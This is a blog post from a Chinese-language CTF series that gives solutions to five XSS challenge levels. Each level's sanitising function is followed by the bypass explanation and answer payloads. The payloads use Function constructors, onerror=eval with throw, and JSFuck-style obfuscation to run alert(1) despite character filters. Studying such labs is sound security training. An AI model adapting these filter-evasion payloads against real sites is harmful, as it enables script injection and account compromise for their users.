iT邦幫忙

2021 iThome 鐵人賽

DAY 26
0

Q1. XSS Lab(2)-4

  1. Well

    • 題目:

      function escape(s) {
        http://www.avlidienbrunn.se/xsschallenge/
      
        s = s.replace(/[\r\n\u2028\u2029\\;,()\[\]<]/g, '');
        return "<script> var email = '" + s + "'; <\/script>";
      }
      

      https://ithelp.ithome.com.tw/upload/images/20211010/20140592LtdmBoksDW.png

      https://ithelp.ithome.com.tw/upload/images/20211010/201405920to13fHxsS.png

    • 由於題目有限制無法使用 (),我們可以使用 String.fromCharCode40 與 `String.fromCharCode`41 替代 ()

    • ANS

      • '+{valueOf:Function`baba${'alert'+String.fromCharCode`40`+1+String.fromCharCode`41`}`}//
      • '+{toString:Function`baba${'alert'+String.fromCharCode`40`+1+String.fromCharCode`41`}`}//
  2. No

    • 此題無法用 firefox,可以使用 chrome

    • 題目:

      // submitted by Stephen Leppik
      
      function escape(s) {
          s = s.replace(/[()`<]/g, ''); // no function calls
      
          return '<script>\n' +
                 'var string = "' + s + '";\n' +
                 'console.log(string);\n' +
                 '</script>';
      }
      
      • 本題會將輸入值中的 ()<` 去除。
    • 解題:

      • window.onerror 是 JavaScript 在 runtime error 時,會觸發的錯誤處理函數
      • 我們可利用 eval 覆蓋 onerror 函數,再用 throw 手動觸發錯誤。
    • ANS: ";onerror=eval;throw'=alert\x281\x29';//

  3. K'Z'K (1)

    • 題目:

      // submitted by Stephen Leppik
      function escape(s) {
          // remove vowels in honor of K'Z'K the Destroyer
          s = s.replace(/[aeiouy]/gi, '');
          return '<script>console.log("' + s + '");</script>';
      }
      
      • 本題會將所有母音刪除
    • 解題:

      • 本題可以利用 JSFuck 中的原理,例如以下 JS 特性:
        • 使用 function constructor 代替 eval
          • 例如:[]["p\x6fp"]["c\x6fnstr\x75ct\x6fr"] 會得到 function constructor
        • 利用不同 type 製造字串,再取其中的字元
          • 例如: ''+!1+!0+{}[0]+{} 會得到 "falsetrueundefined[object Object]"
    • ANS:

      • ");[]["p\x6fp"]["c\x6fnstr\x75ct\x6fr"]('\x61l\x65rt(1)')()//
      • ");_=''+!1+!0+{}[0]+{};[][_[3]+_[19]+_[6]+_[5]][_[23]+_[19]+_[10]+_[3]+_[5]+_[6]+_[7]+_[23]+_[5]+_[19]+_[6]](_[1]+_[2]+_[4]+_[6]+_[5]+'(1)')()//
      • ");[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])//
  4. K'Z'K (2)

    • 題目:
    function escape(s) {
        // remove vowels and escape sequences in honor of K'Z'K 
        // y is only sometimes a vowel, so it's only removed as a literal
        s = s.replace(/[aeiouy]|\\((x|u00)([46][159f]|[57]5)|1([04][15]|[15][17]|[26]5))/gi, '')
        // remove certain characters that can be used to get vowels
        s = s.replace(/[{}!=<>]/g, '');
        return '<script>console.log("' + s + '");</script>';
    }
    
    • 本題過濾母音、或 \((x|u00)([46][159f]|[57]5)|1([04][15]|[15][17]|[26]5
      • 例如 \x6f 會被替換成空字串

      • \ \x6f x6f 只有一個連續字元為 \x6f,所以當 \x6f 替換為空字串時,剩下的字串會組成 \x6f
        https://ithelp.ithome.com.tw/upload/images/20211010/20140592BLvx7hGNFF.png

      • ANS

        • ");[]["p\\x6fx6fp"]["c\\x6fx6fnstr\\x75x75ct\\x6fx6fr"]('\\x61x61l\\x65x65rt(1)')()//
  5. K'Z'K (3)

    • 題目:

      // submitted by Stephen Leppik
      function escape(s) {
          // remove vowels in honor of K'Z'K the Destroyer
          s = s.replace(/[aeiouy]/gi, '');
          // remove certain characters that can be used to get vowels
          s = s.replace(/[{}!=<>\\]/g, '');
          return '<script>console.log("' + s + '");</script>';
      }
      
      • 本題除了過濾母音,還將 {}!=<>\ 也過濾了
      • 由於過濾了 ! ,本題無法直接使用 JSFuck
      • 由於過濾了 \ ,因此也無法在字串中用 Hex 或 Oct 代替母音
    • 解題:

      • 雖然無法用 ! ,但所需的字元依然可以取得,例如:

        • ''+[][[]] : 'undefined' ,可以取得 e i u

        • +[][[]]+'' : 'NaN' ,可以取得 a

        • [][(+[][[]]+'')[1] + 't']+'' :

          "function at() {
              [native code]
          }"
          

          可以取得 o

      • 如此一來, 'c' + ([][(+[][[]]+'')[1] + 't']+'')[6]+ 'nstr' + (''+[][[]])[0] + 'ct' + ([][(+[][[]]+'')[1] + 't']+'')[6] + 'r' 就構成了 constructor ,而 (+[][[]]+'')[1] + 'l' + (''+[][[]])[3] + 'rt(1)' 就構成了 alert(1)

    • ANS:

      • ");[][(+[][[]]+'')[1]+'t']['c'+([][(+[][[]]+'')[1]+'t']+'')[6]+'nstr'+(''+[][[]])[0]+'ct'+([][(+[][[]]+'')[1]+'t']+'')[6]+'r']((+[][[]]+'')[1]+'l'+(''+[][[]])[3] + 'rt(1)')()//
      • ");[]['m'+(++[][[]]+[])[1]+'p']['c'+([]['m'+(++[][[]]+[])[1]+'p']+[])[6]+'nstr'+([][[]]+[])[0]+'ct'+([]['m'+(++[][[]]+[])[1]+'p']+[])[6]+'r']((++[][[]]+[])[1]+'l'+([][[]]+[])[3]+'rt(1)')()//

上一篇
【第二十五天 - XSS Lab(2)-3】
下一篇
【第二十七天 - XSS Lab(2)-5】
系列文
【CTF衝衝衝 - Web篇】30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言